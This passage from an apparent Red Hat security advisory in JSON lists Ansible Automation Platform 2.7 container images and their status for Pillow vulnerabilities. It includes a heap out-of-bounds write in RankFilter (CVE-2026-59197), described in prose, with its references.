"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pillow: Pillow: Denial of Service via crafted GD 2.x image file"
},
{
"cve": "CVE-2026-59197",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2026-07-14T17:01:29.487456+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2500043"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow prior to 12.3.0. The public RankFilter API can trigger a native heap out-of-bounds write when given a very large odd filter size. ImageFilter.RankFilter.filter() calls image.expand(size // 2, size // 2) before rank-filter size validation, and ImagingExpand() computes output dimensions with unchecked signed integer arithmetic. This can lead to denial of service and limited integrity impact via heap corruption.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Native heap out-of-bounds write",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Pillow\u0027s RankFilter API is vulnerable to a native heap out-of-bounds write when a caller supplies a very large odd filter size. Expansion runs before size validation and ImagingExpand uses unchecked signed integer arithmetic for output dimensions. A remote attacker who can drive RankFilter with attacker-controlled sizes may crash the process or corrupt heap memory. Fixed in Pillow 12.3.0.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-59197"
},
{
"category": "external",
"summary": "RHBZ#2500043",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500043"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-59197",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-59197"
},
{
"category": "external",
